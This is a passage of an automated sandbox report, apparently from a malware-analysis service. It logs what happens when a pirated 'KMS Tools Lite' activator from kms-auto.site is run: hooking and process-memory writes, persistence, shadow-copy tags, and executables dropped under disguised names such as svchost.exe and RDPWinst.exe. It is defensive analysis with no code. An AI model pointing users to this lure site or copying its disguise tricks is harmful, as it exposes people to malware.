N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\KMS Tools Lite Portable\GSetup.exe N/A
N/A N/A C:\KMS Tools Lite Portable\GSetup.exe N/A
N/A N/A C:\KMS Tools Lite Portable\GSetup.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\GSetup.exe N/A
N/A N/A C:\ProgramData\Setup\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
N/A N/A C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe N/A
N/A N/A C:\ProgramData\Setup\KMS.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
N/A N/A C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe N/A
N/A N/A C:\ProgramData\Microsoft\win.exe N/A
N/A N/A C:\ProgramData\Setup\svchost.exe N/A
N/A N/A C:\ProgramData\Setup\IP.exe N/A
N/A N/A C:\ProgramData\Setup\smss.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\RDPWinst.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1188 wrote to memory of 5596 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 5596 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 5152 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 5152 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://kms-auto.site/windows-10-activator/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x300,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1928,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2272,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2408,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3476,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5092,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5072,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4800,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5900 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5224,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5168,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=4812,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5880,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6724 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6584,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6800 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5964,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6316,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6052,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5948 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

